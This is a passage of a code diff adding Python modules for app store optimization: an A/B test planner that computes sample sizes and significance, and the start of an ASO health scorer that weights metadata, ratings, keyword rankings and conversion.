||||
'name': 'Control',
|
||||
'details': variant_a,
|
||||
'traffic_split': 0.5
|
||||
},
|
||||
'b': {
|
||||
'name': 'Variation',
|
||||
'details': variant_b,
|
||||
'traffic_split': 0.5
|
||||
}
|
||||
},
|
||||
'success_metric': success_metric,
|
||||
'secondary_metrics': self._get_secondary_metrics(test_type),
|
||||
'minimum_effect_size': self.MIN_EFFECT_SIZES.get(test_type, 0.05),
|
||||
'recommended_confidence': 'standard',
|
||||
'best_practices': self._get_test_best_practices(test_type)
|
||||
}
|
||||
|
||||
self.active_tests.append(test_design)
|
||||
return test_design
|
||||
|
||||
def calculate_sample_size(
|
||||
self,
|
||||
baseline_conversion: float,
|
||||
minimum_detectable_effect: float,
|
||||
confidence_level: str = 'standard',
|
||||
power: float = 0.80
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Calculate required sample size for statistical significance.
|
||||
|
||||
Args:
|
||||
baseline_conversion: Current conversion rate (0-1)
|
||||
minimum_detectable_effect: Minimum effect size to detect (0-1)
|
||||
confidence_level: 'high', 'standard', or 'exploratory'
|
||||
power: Statistical power (typically 0.80 or 0.90)
|
||||
|
||||
Returns:
|
||||
Sample size calculation with duration estimates
|
||||
"""
|
||||
alpha = 1 - self.CONFIDENCE_LEVELS[confidence_level]
|
||||
beta = 1 - power
|
||||
|
||||
# Expected conversion for variant B
|
||||
expected_conversion_b = baseline_conversion * (1 + minimum_detectable_effect)
|
||||
|
||||
# Z-scores for alpha and beta
|
||||
z_alpha = self._get_z_score(1 - alpha / 2) # Two-tailed test
|
||||
z_beta = self._get_z_score(power)
|
||||
|
||||
# Pooled standard deviation
|
||||
p_pooled = (baseline_conversion + expected_conversion_b) / 2
|
||||
sd_pooled = math.sqrt(2 * p_pooled * (1 - p_pooled))
|
||||
|
||||
# Sample size per variant
|
||||
n_per_variant = math.ceil(
|
||||
((z_alpha + z_beta) ** 2 * sd_pooled ** 2) /
|
||||
((expected_conversion_b - baseline_conversion) ** 2)
|
||||
)
|
||||
|
||||
total_sample_size = n_per_variant * 2
|
||||
|
||||
# Estimate duration based on typical traffic
|
||||
duration_estimates = self._estimate_test_duration(
|
||||
total_sample_size,
|
||||
baseline_conversion
|
||||
)
|
||||
|
||||
return {
|
||||
'sample_size_per_variant': n_per_variant,
|
||||
'total_sample_size': total_sample_size,
|
||||
'baseline_conversion': baseline_conversion,
|
||||
'expected_conversion_improvement': minimum_detectable_effect,
|
||||
'expected_conversion_b': expected_conversion_b,
|
||||
'confidence_level': confidence_level,
|
||||
'statistical_power': power,
|
||||
'duration_estimates': duration_estimates,
|
||||
'recommendations': self._generate_sample_size_recommendations(
|
||||
n_per_variant,
|
||||
duration_estimates
|
||||
)
|
||||
}
|
||||
|
||||
def calculate_significance(
|
||||
self,
|
||||
variant_a_conversions: int,
|
||||
variant_a_visitors: int,
|
||||
variant_b_conversions: int,
|
||||
variant_b_visitors: int
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Calculate statistical significance of test results.
|
||||
|
||||
Args:
|
||||
variant_a_conversions: Conversions for control
|
||||
variant_a_visitors: Visitors for control
|
||||
variant_b_conversions: Conversions for variation
|
||||
variant_b_visitors: Visitors for variation
|
||||
|
||||
Returns:
|
||||
Significance analysis with decision recommendation
|
||||
"""
|
||||
# Calculate conversion rates
|
||||
rate_a = variant_a_conversions / variant_a_visitors if variant_a_visitors > 0 else 0
|
||||
rate_b = variant_b_conversions / variant_b_visitors if variant_b_visitors > 0 else 0
|
||||
|
||||
# Calculate improvement
|
||||
if rate_a > 0:
|
||||
relative_improvement = (rate_b - rate_a) / rate_a
|
||||
else:
|
||||
relative_improvement = 0
|
||||
|
||||
absolute_improvement = rate_b - rate_a
|
||||
|
||||
# Calculate standard error
|
||||
se_a = math.sqrt(rate_a * (1 - rate_a) / variant_a_visitors) if variant_a_visitors > 0 else 0
|
||||
se_b = math.sqrt(rate_b * (1 - rate_b) / variant_b_visitors) if variant_b_visitors > 0 else 0
|
||||
se_diff = math.sqrt(se_a**2 + se_b**2)
|
||||
|
||||
# Calculate z-score
|
||||
z_score = absolute_improvement / se_diff if se_diff > 0 else 0
|
||||
|
||||
# Calculate p-value (two-tailed)
|
||||
p_value = 2 * (1 - self._standard_normal_cdf(abs(z_score)))
|
||||
|
||||
# Determine significance
|
||||
is_significant_95 = p_value < 0.05
|
||||
is_significant_90 = p_value < 0.10
|
||||
|
||||
# Generate decision
|
||||
decision = self._generate_test_decision(
|
||||
relative_improvement,
|
||||
is_significant_95,
|
||||
is_significant_90,
|
||||
variant_a_visitors + variant_b_visitors
|
||||
)
|
||||
|
||||
return {
|
||||
'variant_a': {
|
||||
'conversions': variant_a_conversions,
|
||||
'visitors': variant_a_visitors,
|
||||
'conversion_rate': round(rate_a, 4)
|
||||
},
|
||||
'variant_b': {
|
||||
'conversions': variant_b_conversions,
|
||||
'visitors': variant_b_visitors,
|
||||
'conversion_rate': round(rate_b, 4)
|
||||
},
|
||||
'improvement': {
|
||||
'absolute': round(absolute_improvement, 4),
|
||||
'relative_percentage': round(relative_improvement * 100, 2)
|
||||
},
|
||||
'statistical_analysis': {
|
||||
'z_score': round(z_score, 3),
|
||||
'p_value': round(p_value, 4),
|
||||
'is_significant_95': is_significant_95,
|
||||
'is_significant_90': is_significant_90,
|
||||
'confidence_level': '95%' if is_significant_95 else ('90%' if is_significant_90 else 'Not significant')
|
||||
},
|
||||
'decision': decision
|
||||
}
|
||||
|
||||
def track_test_results(
|
||||
self,
|
||||
test_id: str,
|
||||
results_data: Dict[str, Any]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Track ongoing test results and provide recommendations.
|
||||
|
||||
Args:
|
||||
test_id: Test identifier
|
||||
results_data: Current test results
|
||||
|
||||
Returns:
|
||||
Test tracking report with next steps
|
||||
"""
|
||||
# Find test
|
||||
test = next((t for t in self.active_tests if t['test_id'] == test_id), None)
|
||||
if not test:
|
||||
return {'error': f'Test {test_id} not found'}
|
||||
|
||||
# Calculate significance
|
||||
significance = self.calculate_significance(
|
||||
results_data['variant_a_conversions'],
|
||||
results_data['variant_a_visitors'],
|
||||
results_data['variant_b_conversions'],
|
||||
results_data['variant_b_visitors']
|
||||
)
|
||||
|
||||
# Calculate test progress
|
||||
total_visitors = results_data['variant_a_visitors'] + results_data['variant_b_visitors']
|
||||
required_sample = results_data.get('required_sample_size', 10000)
|
||||
progress_percentage = min((total_visitors / required_sample) * 100, 100)
|
||||
|
||||
# Generate recommendations
|
||||
recommendations = self._generate_tracking_recommendations(
|
||||
significance,
|
||||
progress_percentage,
|
||||
test['test_type']
|
||||
)
|
||||
|
||||
return {
|
||||
'test_id': test_id,
|
||||
'test_type': test['test_type'],
|
||||
'progress': {
|
||||
'total_visitors': total_visitors,
|
||||
'required_sample_size': required_sample,
|
||||
'progress_percentage': round(progress_percentage, 1),
|
||||
'is_complete': progress_percentage >= 100
|
||||
},
|
||||
'current_results': significance,
|
||||
'recommendations': recommendations,
|
||||
'next_steps': self._determine_next_steps(
|
||||
significance,
|
||||
progress_percentage
|
||||
)
|
||||
}
|
||||
|
||||
def generate_test_report(
|
||||
self,
|
||||
test_id: str,
|
||||
final_results: Dict[str, Any]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Generate final test report with insights and recommendations.
|
||||
|
||||
Args:
|
||||
test_id: Test identifier
|
||||
final_results: Final test results
|
||||
|
||||
Returns:
|
||||
Comprehensive test report
|
||||
"""
|
||||
test = next((t for t in self.active_tests if t['test_id'] == test_id), None)
|
||||
if not test:
|
||||
return {'error': f'Test {test_id} not found'}
|
||||
|
||||
significance = self.calculate_significance(
|
||||
final_results['variant_a_conversions'],
|
||||
final_results['variant_a_visitors'],
|
||||
final_results['variant_b_conversions'],
|
||||
final_results['variant_b_visitors']
|
||||
)
|
||||
|
||||
# Generate insights
|
||||
insights = self._generate_test_insights(
|
||||
test,
|
||||
significance,
|
||||
final_results
|
||||
)
|
||||
|
||||
# Implementation plan
|
||||
implementation_plan = self._create_implementation_plan(
|
||||
test,
|
||||
significance
|
||||
)
|
||||
|
||||
return {
|
||||
'test_summary': {
|
||||
'test_id': test_id,
|
||||
'test_type': test['test_type'],
|
||||
'hypothesis': test['hypothesis'],
|
||||
'duration_days': final_results.get('duration_days', 'N/A')
|
||||
},
|
||||
'results': significance,
|
||||
'insights': insights,
|
||||
'implementation_plan': implementation_plan,
|
||||
'learnings': self._extract_learnings(test, significance)
|
||||
}
|
||||
|
||||
def _generate_test_id(self, test_type: str) -> str:
|
||||
"""Generate unique test ID."""
|
||||
import time
|
||||
timestamp = int(time.time())
|
||||
return f"{test_type}_{timestamp}"
|
||||
|
||||
def _get_secondary_metrics(self, test_type: str) -> List[str]:
|
||||
"""Get secondary metrics to track for test type."""
|
||||
metrics_map = {
|
||||
'icon': ['tap_through_rate', 'impression_count', 'brand_recall'],
|
||||
'screenshot': ['tap_through_rate', 'time_on_page', 'scroll_depth'],
|
||||
'title': ['impression_count', 'tap_through_rate', 'search_visibility'],
|
||||
'description': ['time_on_page', 'scroll_depth', 'tap_through_rate']
|
||||
}
|
||||
return metrics_map.get(test_type, ['tap_through_rate'])
|
||||
|
||||
def _get_test_best_practices(self, test_type: str) -> List[str]:
|
||||
"""Get best practices for specific test type."""
|
||||
practices_map = {
|
||||
'icon': [
|
||||
'Test only one element at a time (color vs. style vs. symbolism)',
|
||||
'Ensure icon is recognizable at small sizes (60x60px)',
|
||||
'Consider cultural context for global audience',
|
||||
'Test against top competitor icons'
|
||||
],
|
||||
'screenshot': [
|
||||
'Test order of screenshots (users see first 2-3)',
|
||||
'Use captions to tell story',
|
||||
'Show key features and benefits',
|
||||
'Test with and without device frames'
|
||||
],
|
||||
'title': [
|
||||
'Test keyword variations, not major rebrand',
|
||||
'Keep brand name consistent',
|
||||
'Ensure title fits within character limits',
|
||||
'Test on both search and browse contexts'
|
||||
],
|
||||
'description': [
|
||||
'Test structure (bullet points vs. paragraphs)',
|
||||
'Test call-to-action placement',
|
||||
'Test feature vs. benefit focus',
|
||||
'Maintain keyword density'
|
||||
]
|
||||
}
|
||||
return practices_map.get(test_type, ['Test one variable at a time'])
|
||||
|
||||
def _estimate_test_duration(
|
||||
self,
|
||||
required_sample_size: int,
|
||||
baseline_conversion: float
|
||||
) -> Dict[str, Any]:
|
||||
"""Estimate test duration based on typical traffic levels."""
|
||||
# Assume different daily traffic scenarios
|
||||
traffic_scenarios = {
|
||||
'low': 100, # 100 page views/day
|
||||
'medium': 1000, # 1000 page views/day
|
||||
'high': 10000 # 10000 page views/day
|
||||
}
|
||||
|
||||
estimates = {}
|
||||
for scenario, daily_views in traffic_scenarios.items():
|
||||
days = math.ceil(required_sample_size / daily_views)
|
||||
estimates[scenario] = {
|
||||
'daily_page_views': daily_views,
|
||||
'estimated_days': days,
|
||||
'estimated_weeks': round(days / 7, 1)
|
||||
}
|
||||
|
||||
return estimates
|
||||
|
||||
def _generate_sample_size_recommendations(
|
||||
self,
|
||||
sample_size: int,
|
||||
duration_estimates: Dict[str, Any]
|
||||
) -> List[str]:
|
||||
"""Generate recommendations based on sample size."""
|
||||
recommendations = []
|
||||
|
||||
if sample_size > 50000:
|
||||
recommendations.append(
|
||||
"Large sample size required - consider testing smaller effect size or increasing traffic"
|
||||
)
|
||||
|
||||
if duration_estimates['medium']['estimated_days'] > 30:
|
||||
recommendations.append(
|
||||
"Long test duration - consider higher minimum detectable effect or focus on high-impact changes"
|
||||
)
|
||||
|
||||
if duration_estimates['low']['estimated_days'] > 60:
|
||||
recommendations.append(
|
||||
"Insufficient traffic for reliable testing - consider user acquisition or broader targeting"
|
||||
)
|
||||
|
||||
if not recommendations:
|
||||
recommendations.append("Sample size and duration are reasonable for this test")
|
||||
|
||||
return recommendations
|
||||
|
||||
def _get_z_score(self, percentile: float) -> float:
|
||||
"""Get z-score for given percentile (approximation)."""
|
||||
# Common z-scores
|
||||
z_scores = {
|
||||
0.80: 0.84,
|
||||
0.85: 1.04,
|
||||
0.90: 1.28,
|
||||
0.95: 1.645,
|
||||
0.975: 1.96,
|
||||
0.99: 2.33
|
||||
}
|
||||
return z_scores.get(percentile, 1.96)
|
||||
|
||||
def _standard_normal_cdf(self, z: float) -> float:
|
||||
"""Approximate standard normal cumulative distribution function."""
|
||||
# Using error function approximation
|
||||
t = 1.0 / (1.0 + 0.2316419 * abs(z))
|
||||
d = 0.3989423 * math.exp(-z * z / 2.0)
|
||||
p = d * t * (0.3193815 + t * (-0.3565638 + t * (1.781478 + t * (-1.821256 + t * 1.330274))))
|
||||
|
||||
if z > 0:
|
||||
return 1.0 - p
|
||||
else:
|
||||
return p
|
||||
|
||||
def _generate_test_decision(
|
||||
self,
|
||||
improvement: float,
|
||||
is_significant_95: bool,
|
||||
is_significant_90: bool,
|
||||
total_visitors: int
|
||||
) -> Dict[str, Any]:
|
||||
"""Generate test decision and recommendation."""
|
||||
if total_visitors < 1000:
|
||||
return {
|
||||
'decision': 'continue',
|
||||
'rationale': 'Insufficient data - continue test to reach minimum sample size',
|
||||
'action': 'Keep test running'
|
||||
}
|
||||
|
||||
if is_significant_95:
|
||||
if improvement > 0:
|
||||
return {
|
||||
'decision': 'implement_b',
|
||||
'rationale': f'Variant B shows {improvement*100:.1f}% improvement with 95% confidence',
|
||||
'action': 'Implement Variant B'
|
||||
}
|
||||
else:
|
||||
return {
|
||||
'decision': 'keep_a',
|
||||
'rationale': 'Variant A performs better with 95% confidence',
|
||||
'action': 'Keep current version (A)'
|
||||
}
|
||||
|
||||
elif is_significant_90:
|
||||
if improvement > 0:
|
||||
return {
|
||||
'decision': 'implement_b_cautiously',
|
||||
'rationale': f'Variant B shows {improvement*100:.1f}% improvement with 90% confidence',
|
||||
'action': 'Consider implementing B, monitor closely'
|
||||
}
|
||||
else:
|
||||
return {
|
||||
'decision': 'keep_a',
|
||||
'rationale': 'Variant A performs better with 90% confidence',
|
||||
'action': 'Keep current version (A)'
|
||||
}
|
||||
|
||||
else:
|
||||
return {
|
||||
'decision': 'inconclusive',
|
||||
'rationale': 'No statistically significant difference detected',
|
||||
'action': 'Either keep A or test different hypothesis'
|
||||
}
|
||||
|
||||
def _generate_tracking_recommendations(
|
||||
self,
|
||||
significance: Dict[str, Any],
|
||||
progress: float,
|
||||
test_type: str
|
||||
) -> List[str]:
|
||||
"""Generate recommendations for ongoing test."""
|
||||
recommendations = []
|
||||
|
||||
if progress < 50:
|
||||
recommendations.append(
|
||||
f"Test is {progress:.0f}% complete - continue collecting data"
|
||||
)
|
||||
|
||||
if progress >= 100:
|
||||
if significance['statistical_analysis']['is_significant_95']:
|
||||
recommendations.append(
|
||||
"Sufficient data collected with significant results - ready to conclude test"
|
||||
)
|
||||
else:
|
||||
recommendations.append(
|
||||
"Sample size reached but no significant difference - consider extending test or concluding"
|
||||
)
|
||||
|
||||
return recommendations
|
||||
|
||||
def _determine_next_steps(
|
||||
self,
|
||||
significance: Dict[str, Any],
|
||||
progress: float
|
||||
) -> str:
|
||||
"""Determine next steps for test."""
|
||||
if progress < 100:
|
||||
return f"Continue test until reaching 100% sample size (currently {progress:.0f}%)"
|
||||
|
||||
decision = significance.get('decision', {}).get('decision', 'inconclusive')
|
||||
|
||||
if decision == 'implement_b':
|
||||
return "Implement Variant B and monitor metrics for 2 weeks"
|
||||
elif decision == 'keep_a':
|
||||
return "Keep Variant A and design new test with different hypothesis"
|
||||
else:
|
||||
return "Test inconclusive - either keep A or design new test"
|
||||
|
||||
def _generate_test_insights(
|
||||
self,
|
||||
test: Dict[str, Any],
|
||||
significance: Dict[str, Any],
|
||||
results: Dict[str, Any]
|
||||
) -> List[str]:
|
||||
"""Generate insights from test results."""
|
||||
insights = []
|
||||
|
||||
improvement = significance['improvement']['relative_percentage']
|
||||
|
||||
if significance['statistical_analysis']['is_significant_95']:
|
||||
insights.append(
|
||||
f"Strong evidence: Variant B {'improved' if improvement > 0 else 'decreased'} "
|
||||
f"conversion by {abs(improvement):.1f}% with 95% confidence"
|
||||
)
|
||||
|
||||
insights.append(
|
||||
f"Tested {test['test_type']} changes: {test['hypothesis']}"
|
||||
)
|
||||
|
||||
# Add context-specific insights
|
||||
if test['test_type'] == 'icon' and improvement > 5:
|
||||
insights.append(
|
||||
"Icon change had substantial impact - visual first impression is critical"
|
||||
)
|
||||
|
||||
return insights
|
||||
|
||||
def _create_implementation_plan(
|
||||
self,
|
||||
test: Dict[str, Any],
|
||||
significance: Dict[str, Any]
|
||||
) -> List[Dict[str, str]]:
|
||||
"""Create implementation plan for winning variant."""
|
||||
plan = []
|
||||
|
||||
if significance.get('decision', {}).get('decision') == 'implement_b':
|
||||
plan.append({
|
||||
'step': '1. Update store listing',
|
||||
'details': f"Replace {test['test_type']} with Variant B across all platforms"
|
||||
})
|
||||
plan.append({
|
||||
'step': '2. Monitor metrics',
|
||||
'details': 'Track conversion rate for 2 weeks to confirm sustained improvement'
|
||||
})
|
||||
plan.append({
|
||||
'step': '3. Document learnings',
|
||||
'details': 'Record insights for future optimization'
|
||||
})
|
||||
|
||||
return plan
|
||||
|
||||
def _extract_learnings(
|
||||
self,
|
||||
test: Dict[str, Any],
|
||||
significance: Dict[str, Any]
|
||||
) -> List[str]:
|
||||
"""Extract key learnings from test."""
|
||||
learnings = []
|
||||
|
||||
improvement = significance['improvement']['relative_percentage']
|
||||
|
||||
learnings.append(
|
||||
f"Testing {test['test_type']} can yield {abs(improvement):.1f}% conversion change"
|
||||
)
|
||||
|
||||
if test['test_type'] == 'title':
|
||||
learnings.append(
|
||||
"Title changes affect search visibility and user perception"
|
||||
)
|
||||
elif test['test_type'] == 'screenshot':
|
||||
learnings.append(
|
||||
"First 2-3 screenshots are critical for conversion"
|
||||
)
|
||||
|
||||
return learnings
|
||||
|
||||
|
||||
def plan_ab_test(
|
||||
test_type: str,
|
||||
variant_a: Dict[str, Any],
|
||||
variant_b: Dict[str, Any],
|
||||
hypothesis: str,
|
||||
baseline_conversion: float
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Convenience function to plan an A/B test.
|
||||
|
||||
Args:
|
||||
test_type: Type of test
|
||||
variant_a: Control variant
|
||||
variant_b: Test variant
|
||||
hypothesis: Test hypothesis
|
||||
baseline_conversion: Current conversion rate
|
||||
|
||||
Returns:
|
||||
Complete test plan
|
||||
"""
|
||||
planner = ABTestPlanner()
|
||||
|
||||
test_design = planner.design_test(
|
||||
test_type,
|
||||
variant_a,
|
||||
variant_b,
|
||||
hypothesis
|
||||
)
|
||||
|
||||
sample_size = planner.calculate_sample_size(
|
||||
baseline_conversion,
|
||||
planner.MIN_EFFECT_SIZES.get(test_type, 0.05)
|
||||
)
|
||||
|
||||
return {
|
||||
'test_design': test_design,
|
||||
'sample_size_requirements': sample_size
|
||||
}
|
||||
482
packages/llm/skills/app-store-optimization/aso_scorer.py
Normal file
482
packages/llm/skills/app-store-optimization/aso_scorer.py
Normal file
@ -0,0 +1,482 @@
|
||||
"""
|
||||
ASO scoring module for App Store Optimization.
|
||||
Calculates comprehensive ASO health score across multiple dimensions.
|
||||
"""
|
||||
|
||||
from typing import Dict, List, Any, Optional
|
||||
|
||||
|
||||
class ASOScorer:
|
||||
"""Calculates overall ASO health score and provides recommendations."""
|
||||
|
||||
# Score weights for different components (total = 100)
|
||||
WEIGHTS = {
|
||||
'metadata_quality': 25,
|
||||
'ratings_reviews': 25,
|
||||
'keyword_performance': 25,
|
||||
'conversion_metrics': 25
|
||||
}
|
||||
|
||||
# Benchmarks for scoring
|
||||
BENCHMARKS = {
|
||||
'title_keyword_usage': {'min': 1, 'target': 2},
|
||||
'description_length': {'min': 500, 'target': 2000},
|
||||
'keyword_density': {'min': 2, 'optimal': 5, 'max': 8},
|
||||
'average_rating': {'min': 3.5, 'target': 4.5},
|
||||
'ratings_count': {'min': 100, 'target': 5000},
|
||||
'keywords_top_10': {'min': 2, 'target': 10},
|
||||
'keywords_top_50': {'min': 5, 'target': 20},
|
||||
'conversion_rate': {'min': 0.02, 'target': 0.10}
|
||||
}
|
||||
|
||||
def __init__(self):
|
||||
"""Initialize ASO scorer."""
|
||||
self.score_breakdown = {}
|
||||
|
||||
def calculate_overall_score(
|
||||
self,
|
||||
metadata: Dict[str, Any],
|
||||
ratings: Dict[str, Any],
|
||||
keyword_performance: Dict[str, Any],
|
||||
conversion: Dict[str, Any]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Calculate comprehensive ASO score (0-100).
|
||||
|
||||
Args:
|
||||
metadata: Title, description quality metrics
|
||||
ratings: Rating average and count
|
||||
keyword_performance: Keyword ranking data
|
||||
conversion: Impression-to-install metrics
|
||||
|
||||
Returns:
|
||||
Overall score with detailed breakdown
|
||||
"""
|
||||
# Calculate component scores
|
||||
metadata_score = self.score_metadata_quality(metadata)
|
||||
ratings_score = self.score_ratings_reviews(ratings)
|
||||
keyword_score = self.score_keyword_performance(keyword_performance)
|
||||
conversion_score = self.score_conversion_metrics(conversion)
|
||||
|
||||
# Calculate weighted overall score
|
||||
overall_score = (
|
||||
metadata_score * (self.WEIGHTS['metadata_quality'] / 100) +
|
||||
ratings_score * (self.WEIGHTS['ratings_reviews'] / 100) +
|
||||
keyword_score * (self.WEIGHTS['keyword_performance'] / 100) +
|
||||
conversion_score * (self.WEIGHTS['conversion_metrics'] / 100)
|
||||
)
|
||||
|
||||
# Store breakdown
|
||||
self.score_breakdown = {
|
||||
'metadata_quality': {
|
||||
'score': metadata_score,
|
||||
'weight': self.WEIGHTS['metadata_quality'],
|
||||
'weighted_contribution': round(metadata_score * (self.WEIGHTS['metadata_quality'] / 100), 1)
|
||||
},
|
||||
'ratings_reviews': {
|
||||
'score': ratings_score,
|
||||
'weight': self.WEIGHTS['ratings_reviews'],
|
||||
'weighted_contribution': round(ratings_score * (self.WEIGHTS['ratings_reviews'] / 100), 1)
|
||||
},
|
||||
'keyword_performance': {
|
||||
'score': keyword_score,
|
||||
'weight': self.WEIGHTS['keyword_performance'],
|
||||
'weighted_contribution': round(keyword_score * (self.WEIGHTS['keyword_performance'] / 100), 1)
|
||||
},
|
||||
'conversion_metrics': {
|
||||
'score': conversion_score,
|
||||
'weight': self.WEIGHTS['conversion_metrics'],
|
||||
'weighted_contribution': round(conversion_score * (self.WEIGHTS['conversion_metrics'] / 100), 1)
|
||||
}
|
||||
}
|
||||
|
||||
# Generate recommendations
|
||||
recommendations = self.generate_recommendations(
|
||||
metadata_score,
|
||||
ratings_score,
|
||||
keyword_score,
|
||||
conversion_score
|
||||
)
|
||||
|
||||
# Assess overall health
|
||||
health_status = self._assess_health_status(overall_score)
|
||||
|
||||
return {
|
||||
'overall_score': round(overall_score, 1),
|
||||
'health_status': health_status,
|
||||
'score_breakdown': self.score_breakdown,
|
||||
'recommendations': recommendations,
|
||||
'priority_actions': self._prioritize_actions(recommendations),
|
||||
'strengths': self._identify_strengths(self.score_breakdown),
|
||||
'weaknesses': self._identify_weaknesses(self.score_breakdown)
|
||||
}
|
||||
|
||||
def score_metadata_quality(self, metadata: Dict[str, Any]) -> float:
|
||||
"""
|
||||
Score metadata quality (0-100).
|
||||
|
||||
Evaluates:
|
||||
- Title optimization
|
||||
- Description quality
|
||||
- Keyword usage
|
||||
"""
|
||||
scores = []
|
||||
|
||||
# Title score (0-35 points)
|
||||
title_keywords = metadata.get('title_keyword_count', 0)
|
||||
title_length = metadata.get('title_length', 0)
|
||||
|
||||
title_score = 0
|
||||
if title_keywords >= self.BENCHMARKS['title_keyword_usage']['target']:
|
||||
title_score = 35
|
||||
elif title_keywords >= self.BENCHMARKS['title_keyword_usage']['min']:
|
||||
title_score = 25
|
||||
else:
|
||||
title_score = 10
|
||||
|
||||
# Adjust for title length usage
|
||||
if title_length > 25: # Using most of available space
|
||||
title_score += 0
|
||||
else:
|
||||
title_score -= 5
|
||||
|
||||
scores.append(min(title_score, 35))
|
||||
|
||||
# Description score (0-35 points)
|
||||
desc_length = metadata.get('description_length', 0)
|
||||
desc_quality = metadata.get('description_quality', 0.0) # 0-1 scale
|
||||
|
||||
desc_score = 0
|
||||
if desc_length >= self.BENCHMARKS['description_length']['target']:
|
||||
desc_score = 25
|
||||
elif desc_length >= self.BENCHMARKS['description_length']['min']:
|
||||
desc_score = 15
|
||||
else:
|
||||
desc_score = 5
|
||||
|
||||
# Add quality bonus
|
||||
desc_score += desc_quality * 10
|
||||
scores.append(min(desc_score, 35))
|
||||
|
||||
# Keyword density score (0-30 points)
|
||||
keyword_density = metadata.get('keyword_density', 0.0)
|
||||
|
||||
if self.BENCHMARKS['keyword_density']['min'] <= keyword_density <= self.BENCHMARKS['keyword_density']['optimal']:
|
||||
density_score = 30
|
||||
elif keyword_density < self.BENCHMARKS['keyword_density']['min']:
|
||||
# Too low - proportional scoring
|
||||
density_score = (keyword_density / self.BENCHMARKS['keyword_density']['min']) * 20
|
||||
else:
|
||||
# Too high (keyword stuffing) - penalty
|
||||
excess = keyword_density - self.BENCHMARKS['keyword_density']['optimal']
|
||||
density_score = max(30 - (excess * 5), 0)
|
||||
|
||||
scores.append(density_score)
|
||||
|
||||
return round(sum(scores), 1)
|
||||
|
||||
def score_ratings_reviews(self, ratings: Dict[str, Any]) -> float:
|
||||
"""
|
||||
Score ratings and reviews (0-100).
|
||||
|
||||
Evaluates:
|
||||
- Average rating
|
||||
- Total ratings count
|
||||
- Review velocity
|
||||
"""
|
||||
average_rating = ratings.get('average_rating', 0.0)
|
||||
total_ratings = ratings.get('total_ratings', 0)
|
||||
recent_ratings = ratings.get('recent_ratings_30d', 0)
|
||||
|
||||
# Rating quality score (0-50 points)
|
||||
if average_rating >= self.BENCHMARKS['average_rating']['target']:
|
||||
rating_quality_score = 50
|
||||
elif average_rating >= self.BENCHMARKS['average_rating']['min']:
|
||||
# Proportional scoring between min and target
|
||||
proportion = (average_rating - self.BENCHMARKS['average_rating']['min']) / \
|
||||
(self.BENCHMARKS['average_rating']['target'] - self.BENCHMARKS['average_rating']['min'])
|
||||
rating_quality_score = 30 + (proportion * 20)
|
||||
elif average_rating >= 3.0:
|
||||
rating_quality_score = 20
|
||||
else:
|
||||
rating_quality_score = 10
|
||||
|
||||
# Rating volume score (0-30 points)
|
||||
if total_ratings >= self.BENCHMARKS['ratings_count']['target']:
|
||||
rating_volume_score = 30
|
||||
elif total_ratings >= self.BENCHMARKS['ratings_count']['min']:
|
||||
# Proportional scoring
|
||||
proportion = (total_ratings - self.BENCHMARKS['ratings_count']['min']) / \
|
||||
(self.BENCHMARKS['ratings_count']['target'] - self.BENCHMARKS['ratings_count']['min'])
|
||||
rating_volume_score = 15 + (proportion * 15)
|
||||
else:
|
||||
# Very low volume
|
||||
rating_volume_score = (total_ratings / self.BENCHMARKS['ratings_count']['min']) * 15
|
||||
|
||||
# Rating velocity score (0-20 points)
|
||||
if recent_ratings > 100:
|
||||
velocity_score = 20
|
||||
elif recent_ratings > 50:
|
||||
velocity_score = 15
|
||||
elif recent_ratings > 10:
|
||||
velocity_score = 10
|
||||
else:
|
||||
velocity_score = 5
|
||||
|
||||
total_score = rating_quality_score + rating_volume_score + velocity_score
|
||||
|
||||
return round(min(total_score, 100), 1)
|
||||
|
||||
def score_keyword_performance(self, keyword_performance: Dict[str, Any]) -> float:
|
||||
"""
|
||||
Score keyword ranking performance (0-100).
|
||||
|
||||
Evaluates:
|
||||
- Top 10 rankings
|
||||
- Top 50 rankings
|
||||
- Ranking trends
|
||||
"""
|
||||
top_10_count = keyword_performance.get('top_10', 0)
|
||||
top_50_count = keyword_performance.get('top_50', 0)
|
||||
top_100_count = keyword_performance.get('top_100', 0)
|
||||
improving_keywords = keyword_performance.get('improving_keywords', 0)
|
||||
|
||||
# Top 10 score (0-50 points) - most valuable rankings
|
||||
if top_10_count >= self.BENCHMARKS['keywords_top_10']['target']:
|
||||
top_10_score = 50
|
||||
elif top_10_count >= self.BENCHMARKS['keywords_top_10']['min']:
|
||||
proportion = (top_10_count - self.BENCHMARKS['keywords_top_10']['min']) / \
|
||||
(self.BENCHMARKS['keywords_top_10']['target'] - self.BENCHMARKS['keywords_top_10']['min'])
|
||||
top_10_score = 25 + (proportion * 25)
|
||||
else:
|
||||
top_10_score = (top_10_count / self.BENCHMARKS['keywords_top_10']['min']) * 25
|
||||
|
||||
# Top 50 score (0-30 points)
|
||||
if top_50_count >= self.BENCHMARKS['keywords_top_50']['target']:
|
||||
top_50_score = 30
|
||||
elif top_50_count >= self.BENCHMARKS['keywords_top_50']['min']:
|
||||
proportion = (top_50_count - self.BENCHMARKS['keywords_top_50']['min']) / \
|
||||
(self.BENCHMARKS['keywords_top_50']['target'] - self.BENCHMARKS['keywords_top_50']['min'])
|
||||
top_50_score = 15 + (proportion * 15)
|
||||
else:
|
||||
top_50_score = (top_50_count / self.BENCHMARKS['keywords_top_50']['min']) * 15
|
||||
|
||||
# Coverage score (0-10 points) - based on top 100
|
||||
coverage_score = min((top_100_count / 30) * 10, 10)
|
||||
|
||||
# Trend score (0-10 points) - are rankings improving?
|
||||
if improving_keywords > 5:
|
||||
trend_score = 10
|
||||
elif improving_keywords > 0:
|
||||
trend_score = 5
|
||||
else:
|
||||
trend_score = 0
|
||||
|
||||
total_score = top_10_score + top_50_score + coverage_score + trend_score
|
||||
|
||||
return round(min(total_score, 100), 1)
|
||||
|
||||
def score_conversion_metrics(self, conversion: Dict[str, Any]) -> float:
|
||||
"""
|
||||
Score conversion performance (0-100).
|
||||
|
||||
Evaluates:
|
||||
- Impression-to-install conversion rate
|
||||
- Download velocity
|
||||
"""
|
||||
conversion_rate = conversion.get('impression_to_install', 0.0)
|
||||
downloads_30d = conversion.get('downloads_last_30_days', 0)
|
||||
